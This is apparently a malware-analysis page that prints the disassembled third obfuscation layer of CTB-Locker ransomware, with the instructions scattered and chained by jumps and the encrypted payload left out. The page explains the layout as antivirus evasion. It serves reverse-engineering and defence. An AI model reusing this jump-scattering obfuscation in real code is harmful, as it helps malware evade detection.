CTB-Locker Third Payload obfuscation layer code
Bellow is the CTB-Locker third payload obfuscation layer code without ciphered data represented with [...]. Deciphering code
is broken in chunks of "one instruction - jump to the next" and scattered through encrypted code that will be deciphered.
This is probably intented to get around antivirus and incidentally slow down reversing process.
You can return to CTB-Locker Payload obfuscation layers in-depth analysis to see this code in correct order and commented.
004013C2 imul EDX, EDX, -24F331C1h 004013C8 jmp 00482BDBh [...] 00401FA3 push EBP ; <===== Entry point 00401FA4 jmp near ptr 440E0Ch [...] 00402EDD push DWORD PTR SS:[EBP-8] 00402EE0 jmp 00494D18h [...] 00403232 mov ESI, DWORD PTR SS:[EBP-14h] 00403235 jmp 00481B41h [...] 00406EC7 call EAX 00406EC9 jmp 00456763h [...] 00409BF9 dec ECX 00409BFA jmp 0043D334h [...] 0040AEDA push DWORD PTR SS:[EBP-4] 0040AEDD jmp 00402EDDh [...] 0040BE41 mov DWORD PTR SS:[EBP-0Ch], EBX 0040BE44 jmp 004577F8h [...] 0040EBFC xor EAX, EAX 0040EBFE jmp 0046FB58h [...] 0040DFA4 jmp 0040EBFCh [...] 0040EBFC xor EAX, EAX 0040EBFE jmp 0046FB58h [...] 00410F28 push 20h 00410F2A jmp 004977D6h [...] 00412FC8 lea EAX, [EBP-20h] 00412FCB jmp 0046314Fh [...] 00422961 add EAX, -5 00422964 jmp 00406EC7h [...] 0042C1A4 cmp AL, 0E0h 0042C1A6 jmp 00452BFDh [...] 0042E492 sub EAX,8A9DBh 0042E497 jmp 004418F3h [...] 0042FD07 mov ESI, DWORD PTR SS:[EBP-8] 0042FD0A jmp 00440918h [...] 0043CDB5 push 1000h 0043CDBA jmp 004490B2h [...] 0043D334 jne 00466599h 0043D33A jmp 00492239h [...] 0043F5EF je 00476589h 0043F5F5 jmp 004533E5h [...] 0044033D leave 0044033E jmp 004743E1h [...] 00440918 add ESI,0B0h 0044091E jmp 00442CA3h [...] 00440E0C mov EBP, ESP 00440E0E jmp 00456CF9h [...] 004418F3 mov DWORD PTR SS:[EBP-8], EAX 004418F6 jmp 00467F6Bh [...] 004429DE mov ebx, DWORD PTR SS:[EBP-8] 004429E1 jmp 0043CDB5h [...] 00442CA3 mov EDX, C78E5EC3h 00442CA8 jmp 00461B73h [...] 004490B2 push 21A000h 004490B7 jmp 0046AD3Bh [...] 0044B84F mov ECX, EAX 0044B851 jmp 00466599h [...] 0044CD98 mov DWORD PTR SS:[EBP-18h], EDI 0044CD9B jmp 00412FC8h [...] 00452BFD jae 00457B58h 00452C03 jmp 0044B84Fh [...] 004533E5 rol edx, 3 004533E8 jmp 00488A90h [...] 00456CF9 sub ESP,20h 00456CF9 jmp 0040BE41h [...] 00456763 mov EBX, DWORD PTR SS:[EBP-0Ch] 00456766 jmp 00403232h [...] 004577F8 mov DWORD PTR SS:[EBP-10], EDI 004577FB jmp 004A0949h [...] 00457B58 lea ESI, [EAX+ESI-0E0h] 00457B5F jmp 0040DFA4h [...] 00461B73 mov EDI, DWORD PTR SS:[EBP-4] 00461B76 jmp 0040EBFCh [...] 0046314F push EAX 00463150 jmp 00410F28h [...] 00464022 rol EDX, 3 00464025 jmp 004013C2h [...] 00466599 lods BYTE PTR DS:[ESI] 0046659A jmp 00497C5Dh [...] 00467F6B push 4 00467F6D jmp 004429DEh [...] 0046AD3B push 0 0046AD3D jmp 0047404Bh [...] 0046FB58 lods BYTE PTR DS:[ESI] 0046FB59 jmp 0048A723h [...] 0047404B call DWORD PTR DS:[EBX+4] 0047404E jmp 004887A7h [...] 004743E1 retn [...] 00476589 mov DWORD PTR SS:[EBP-1Ch], ESI 0047658C jmp 0044CD98h [...] 00481B41 mov EDI, DWORD PTR SS:[EBP-10h] 00481B44 jmp 0044033Dh [...] 00482BDB stos BYTE PTR ES:[EDI] 00482BDC jmp 00409BF9h [...] 004833F3 push DWORD PTR SS:[EBP-1Ch] 004833F6 jmp 0040AEDAh [...] 004887A7 mov DWORD PTR SS:[EBP-4], EAX 004887AA jmp 0042FD07h [...] 00488A90 imul EDX, EDX, -24F331C1h 00488A96 jmp 0042C1A4h [...] 0048A723 xor AL, DL 0048A725 jmp 0043F5EFh [...] 0048B6F7 call DWORD PTR DS:[EBX+8] 0048B6FA jmp 004833F3h [...] 0048B9D6 call 0048B9DBh 0048B9DB pop EAX 0048B9DC jmp 0042E492h [...] 0048CD0A push DWORD PTR DS:[EAX+1Ch] 0048CD0D jmp 0048B6F7h [...] 00492239 jmp 0040EBFCh [...] 00494D18 mov EAX, DWORD PTR SS:[EBP-18h] 00494D1B jmp 00422961h [...] 004977D6 push 21A000h 004977DB jmp 0048CD0Ah [...] 00497C5D xor AL, DL 00497C5F jmp 00464022h [...] 004A0949 mov DWORD PTR SS:[EBP-14], ESI 004A094C jmp 0048B9D6h [...]